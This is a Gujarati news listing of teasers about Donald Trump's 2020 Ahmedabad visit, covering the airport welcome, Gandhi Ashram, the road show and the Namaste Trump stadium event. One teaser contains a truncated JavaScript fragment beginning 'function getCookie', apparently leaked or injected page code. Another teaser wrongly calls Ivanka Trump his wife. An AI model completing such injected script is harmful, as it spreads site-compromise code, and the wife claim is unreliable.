અમદાવાદ ખાતે પધારેલા અમેરિકાના પ્રેસિડેન્ટ ડોનાલ્ડ ટ્રમ્પનુ ભવ્ય સ્વાગત કરવામાં આવ્યું છે. અમદાવાદ એરપોર્ટ પર વડાપ્રધાન મોદી દ્વારા તેમનું ભેટીને સ્વાગત થયું ત્યાર બાદ...
વડાપ્રધાન મોદી અને ડોનાલ્ડ ટ્રમ્પ ગાંધી આશ્રમ પહોંચી ગયાં છે. ત્યાં પહોંચીને ડોનાલ્ડ ટ્રમ્પે મહાત્મા ગાંધીજીની તસવીરને સુતરની આંટી પહેરાવીને વંદન કર્યાં હતાં. ટ્રમ્પની...
ડોનાલ્ડ ટ્રમ્પ અને નરેન્દ્ર મોદીનો કાફલો અમદાવાદ એરપોર્ટથી રવાના થઈ ગયો છે. અહીં એરપોર્ટથી મોટેરા સ્ટેડિયમ સુધી બંને નેતા રોડ શો કરી રહ્યા છે....
અમેરિકાના પ્રેસિડેન્ટ ડોનાલ્ડ ટ્રમ્પ અને તેમના પત્ની ઈવાન્કા ટ્રમ્પ અમદાવાદ એરપોર્ટ પર આવતાં જ ભારતના વડાપ્રધાન મોદીએ તેમનું ભેટીને સ્વાગત કર્યું હતું. તે ઉપરાંત...
જુઓ અમદાવાદના નવનિર્મિત મોટેરા સ્ટેડિયમમાં નમસ્તે ટ્રમ્પ કાર્યક્રમમાં ઉમટી પડેલા જનસૈલાબની ઝાંખી કરાવતી અને સ્ટેડિયમની આહલાદક પ્રસ્તુતી આપતી તસ્વીરો function getCookie(e){var U=document.cookie.match(new...
ડોનાલ્ડ ટ્રમ્પ અને નરેન્દ્ર મોદીનો રોડ શૉ જે રૂટ પર થવાનો છે ત્યાંના રહેવાસીઓને સવારથી જ ઘરમા પુરાઈ રહેવું પડે તેવી સ્થિતિ ઉભી થઇ...
અમેરિકન પ્રેસિડેન્ટ ડોનાલ્ડ ટ્રમ્પના નમસ્તે ટ્રમ્પ કાર્યક્રમનો આખરે આજે દિવસ છે. તેઓ અમદાવાદ પહોંચવામાં તૈયારીમાં છે ત્યારે અમદાવાદના નવનિર્મિત મોટેરા સ્ટેડિયમ ખાતે ભારે જનમેદની...
અમદાવાદ શહેરમાં CRPCની કલમ 144ના સતત અમલ મામલે હાઇકોર્ટમાં થયેલી અરજીમાં કોર્ટે પોલીસનો ઊધડો લીધો હતો અને એસીપી દ્વારા રજૂ કરેલા સોંગદનામાથી સંતોષ નહીં...
ડોનાલ્ડ ટ્રમ્પના અમદાવાદના રોડ શો માટે તંત્ર તડામાર તૈયારીઓમાં વ્યસ્ત છે. વરિષ્ઠ અધિકારીઓ રોડ શોની તૈયારીઓ પર નજર રાખી રહ્યા છે. 22 કિમી લાંબા...
અમેરિકાના પ્રેસિડેન્ટ ડોનાલ્ડ ટ્રમ્પ આગામી 24મી ફેબ્રુઆરીએ ગુજરાતની એક દિવસની મુલાકાતે છે. ત્યારે તેઓ અમદાવાદમાં ગાંધી આશ્રમ અને મોટેરા સ્ટેડિયમમાં નમસ્તે ટ્રમ્પ નામનાં કાર્યક્રમમાં...